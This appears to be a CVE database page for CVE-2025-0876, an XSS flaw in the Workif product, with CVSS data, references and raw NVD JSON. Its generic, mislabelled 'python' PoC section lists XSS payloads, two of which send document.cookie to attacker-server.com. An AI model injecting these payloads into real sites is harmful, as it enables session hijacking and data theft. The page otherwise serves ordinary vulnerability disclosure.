CVE-2025-0876

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Isin Basi Advertisement Information Technologies Trade Inc. IT's Workif allows Cross-Site Scripting (XSS).This issue affects IT's Workif: through 20251003. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

IT's Workif <= 20251003

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-0876: IT's Workif XSS PoC -->
<!-- This PoC demonstrates the XSS vulnerability in IT's Workif -->
<!-- Since the vulnerability requires high privileges (PR:H), the attacker needs valid credentials -->

<!-- Example 1: Basic reflected XSS payload -->
<script>alert('XSS-CVE-2025-0876')</script>

<!-- Example 2: Cookie stealing payload (for demonstration purposes) -->
<script>
  var img = new Image();
  img.src = "https://attacker-server.com/steal?cookie=" + document.cookie;
</script>

<!-- Example 3: Event handler-based XSS -->
<img src=x onerror="alert(document.domain)">

<!-- Example 4: SVG-based XSS -->
<svg onload="alert('XSS')">

<!-- Example 5: Using fetch to exfiltrate data -->
<script>
  fetch('https://attacker-server.com/log', {
    method: 'POST',
    body: JSON.stringify({cookie: document.cookie, url: location.href}),
    headers: {'Content-Type': 'application/json'}
  });
</script>

<!-- Note: This vulnerability affects IT's Workif through version 20251003 -->
<!-- The payload would be injected into input fields that are later rendered in web pages without proper sanitization -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-0876
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-0876
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-0876/
[4] VulDB https://vuldb.com/cve/CVE-2025-0876
[5] https://www.usom.gov.tr/bildirim/tr-25-0312

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-0876", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:41.367", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Isin Basi Advertisement Information Technologies Trade Inc. IT's Workif allows Cross-Site Scripting (XSS).This issue affects IT's Workif: through 20251003. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.7, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0312", "source": "[email protected]"}]}}